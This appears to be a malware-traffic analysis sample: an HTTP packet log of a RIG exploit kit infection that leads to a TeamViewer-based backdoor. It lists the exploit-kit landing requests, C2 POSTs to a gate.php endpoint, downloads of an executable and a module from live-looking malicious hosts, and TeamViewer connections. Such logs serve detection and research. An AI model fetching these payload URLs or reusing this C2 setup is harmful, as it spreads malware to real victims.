RIG Exploit Kit (EK) delivering a TeamViewer reverse shell backdoor: malware PCAP file download traffic sample

2016-10-21 21:31:29.018549 IP 192.168.1.5.50248 > 192.95.15.211.80: Flags [P.], seq 454:1107, ack 2446, win 16537, length 653: HTTP: GET /index.php?w36KfrmaJR3NA4I=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_W5SDx-1g HTTP/1.1
GET /index.php?w36KfrmaJR3NA4I=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_W5SDx-1g HTTP/1.1
Accept: */*
Referer: http://gl9q.s57ae8vl3.top/?w36KfrmaJR3NA4I=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gl9q.s57ae8vl3.top
Connection: Keep-Alive

2016-10-21 21:31:29.285255 IP 192.95.15.211.80 > 192.168.1.5.50248: Flags [.], ack 1107, win 1162, length 0

2016-10-21 21:31:31.440263 IP 192.168.1.5.50248 > 192.95.15.211.80: Flags [P.], seq 1107:1540, ack 79746, win 16450, length 433: HTTP: GET /index.php?w36KfrmaJR3NA4I=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K8QT98kKM&dfgsdf=2 HTTP/1.1
GET /index.php?w36KfrmaJR3NA4I=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpOD9UHfYg5D_5qdFeA_3gykx7lHdJhxxxOB6jBZzL8aQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K8QT98kKM&dfgsdf=2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: gl9q.s57ae8vl3.top
Connection: Keep-Alive

2016-10-21 21:31:31.633994 IP 192.95.15.211.80 > 192.168.1.5.50248: Flags [.], ack 1540, win 1244, length 0
2016-10-21 21:31:32.975009 IP 192.95.15.211.80 > 192.168.1.5.50248: Flags [.], seq 79746:81096, ack 1540, win 1244, length 1350: HTTP: HTTP/1.1 200 OK

2016-10-21 21:31:52.161258 IP 192.168.1.5.50256 > 108.61.74.45.80: Flags [P.], seq 1:344, ack 1, win 16537, length 343: HTTP: POST /a210/gate.php HTTP/1.1
POST /a210/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Content-Length: 74
Host: evoci.xyz

2016-10-21 21:31:55.561180 IP 192.168.1.5.50257 > 91.218.228.52.80: Flags [P.], seq 1:310, ack 1, win 16537, length 309: HTTP: GET /tseny-na-pilomaterialy-prays/zazc.exe HTTP/1.1
GET /tseny-na-pilomaterialy-prays/zazc.exe HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tk-avitek.ru

2016-10-21 21:31:55.917181 IP 91.218.228.52.80 > 192.168.1.5.50257: Flags [.], ack 310, win 123, length 0
2016-10-21 21:31:55.919514 IP 91.218.228.52.80 > 192.168.1.5.50257: Flags [.], seq 1:1351, ack 310, win 123, length 1350: HTTP: HTTP/1.1 200 OK

2016-10-21 21:31:59.295589 IP 192.168.1.5.50258 > 108.61.74.45.80: Flags [P.], seq 1:344, ack 1, win 16537, length 343: HTTP: POST /a210/gate.php HTTP/1.1
POST /a210/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Content-Length: 47
Host: evoci.xyz

2016-10-21 21:31:59.295590 IP 192.168.1.5.50258 > 108.61.74.45.80: Flags [P.], seq 344:391, ack 1, win 16537, length 47: HTTP

2016-10-21 21:32:01.664843 IP 192.168.1.5.50262 > 108.61.74.45.80: Flags [P.], seq 1:292, ack 1, win 16537, length 291: HTTP: GET /direct/fg_24e90bba.mod HTTP/1.1
GET /direct/fg_24e90bba.mod HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: evoci.xyz

2016-10-21 21:32:14.806491 IP 192.168.1.5.50276 > 108.61.74.45.80: Flags [P.], seq 1:344, ack 1, win 16537, length 343: HTTP: POST /a210/gate.php HTTP/1.1
POST /a210/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/octet-stream
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Content-Length: 46
Host: evoci.xyz

2016-10-21 21:32:14.806492 IP 192.168.1.5.50276 > 108.61.74.45.80: Flags [P.], seq 344:390, ack 1, win 16537, length 46: HTTP

2016-10-21 21:33:16.619769 IP 192.168.1.5.50293 > 198.105.254.228.80: Flags [P.], seq 1:601, ack 1, win 64800, length 600: HTTP: POST /forum/contact.php HTTP/1.1
POST /forum/contact.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: dreamscomtrue.site
Content-Length: 368
Connection: Keep-Alive
Cache-Control: no-cache

  • 37.252.248.78 – TCP Port 5938 – ping3.dyngate.com – TEAMVIEWER COMMUNICATION
  • 178.77.120.100 – TCP Port 5938 – master.dyngate.com – TEAMVIEWER COMMUNICATION
  • 169.54.137.81 – TCP Port 5938 – TEAMVIEWER COMMUNICATION
  • 173.192.194.94 – TCP Port 5938 – TEAMVIEWER COMMUNICATION